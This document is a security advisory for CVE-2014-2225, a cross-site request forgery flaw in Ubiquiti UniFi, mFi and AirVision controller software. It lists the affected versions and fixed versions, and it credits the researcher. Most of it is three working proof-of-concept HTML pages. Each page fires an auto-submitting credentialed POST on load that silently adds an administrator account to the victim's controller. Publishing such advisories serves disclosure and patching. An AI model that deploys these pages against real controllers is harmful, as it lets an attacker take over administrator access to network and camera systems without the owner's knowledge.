# Vendor Homepage: (http://www.ubnt.com/)
# Tested on: Kali Linux
-----------------------------------------
Affected Products/Versions:
-----------------------------------------
UniFi Controller v2.4.6
mFi Controller v2.0.15
AirVision Controller v2.1.3
Note: Previous versions may be affected
-----------------
Description:
-----------------
Title: Cross-site Request Forgery (CSRF)
CVE: CVE-2014-2225
CWE: http://cwe.mitre.org/data/definitions/352.html
Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2225.html
Researcher: Seth Art - @sethsec
---------------
UniFi POC:
---------------
<html>
<head>
<script>
function sendCSRF()
{
var url_base = "https://192.168.0.106:8443/api/add/admin"
var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
var xmlhttp;
xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", url_base, true);
xmlhttp.setRequestHeader("Accept","*/*");
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;
charset=UTF-8");
xmlhttp.withCredentials= "true";
xmlhttp.send(post_data);
}
</script>
</head>
<body>
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
<body onload="sendCSRF()">
</body>
-------------
mFi POC:
-------------
<html>
<head>
<script>
function sendCSRF()
{
var url_base = "https://192.168.0.106:6443/api/v1.0/add/admin"
var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
var xmlhttp;
xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", url_base, true);
xmlhttp.setRequestHeader("Accept","*/*");
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;
charset=UTF-8");
xmlhttp.withCredentials= "true";
xmlhttp.send(post_data);
}
</script>
</head>
<body>
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
<body onload="sendCSRF()">
</body>
--------------------
AirVision POC:
--------------------
<html>
<head>
<script>
function sendCSRF()
{
var url_base = "https://192.168.0.106:7443/api/v2.0/admin"
var post_data="{\”name\”:\”csrf\”,\”email\”:\”csrf@gmail.com\”,\”userGroup:\”:\”admin\”,\”x_password\”:\”password\”,\”confirmPassword\”:\”password\”,\”disabled\”:\”false\”}”
var xmlhttp;
xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", url_base, true);
xmlhttp.setRequestHeader("Accept","*/*");
xmlhttp.setRequestHeader("Content-type","application/plain; charset=UTF-8");
xmlhttp.withCredentials= "true";
xmlhttp.send(post_data);
}
</script>
</head>
<body>
<h1>CSRF POC</h1>
Sending CSRF Payload!!!
<body onload="sendCSRF()">
</body>
-------------
Solution:
-------------
UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater
mFi Controller - Upgrade to mFi Controller v2.0.24 or greater
AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note:
The application name changed from AirVision to UniFi Video)